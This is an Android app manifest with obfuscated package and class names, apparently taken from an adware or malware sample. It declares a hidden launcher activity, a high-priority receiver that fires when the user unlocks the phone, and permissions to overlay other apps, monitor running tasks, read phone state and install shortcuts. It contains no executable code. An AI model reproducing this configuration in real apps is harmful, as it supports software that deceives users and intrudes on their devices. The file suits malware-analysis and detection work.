<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.mofpulw.drqvjtiiog">
    <application android:icon="@drawable/icon" android:label="@string/app_name">
        <activity android:configChanges="keyboardHidden|navigation|orientation" android:label="@string/app_name" android:launchMode="singleTask" android:name="com.mofpulw.drqvjtiiog.BGActivity" android:screenOrientation="portrait" android:theme="@android:style/Theme.Black.NoTitleBar.Fullscreen">
            <intent-filter/>
        </activity>
        <meta-data android:name="np_app_key" android:value="100514802"/>
        <activity android:excludeFromRecents="true" android:name="com.kIEHPS.rmOpbJBlnCdg">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="keyboardHidden|orientation" android:excludeFromRecents="true" android:name="com.kIEHPS.fPssjlnU"/>
        <activity android:excludeFromRecents="true" android:name="com.kIEHPS.OdQPUGkPEJvgUal"/>
        <service android:name="com.kIEHPS.mbwriEecLIQTii"/>
        <service android:name="com.kIEHPS.astfMtFaOBRT"/>
        <receiver android:name="com.kIEHPS.MDVPJLIVPCm"/>
        <receiver android:name="com.kIEHPS.userPermissionReceiver">
            <intent-filter android:priority="90000">
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
    </application>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:smallScreens="true"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
</manifest>
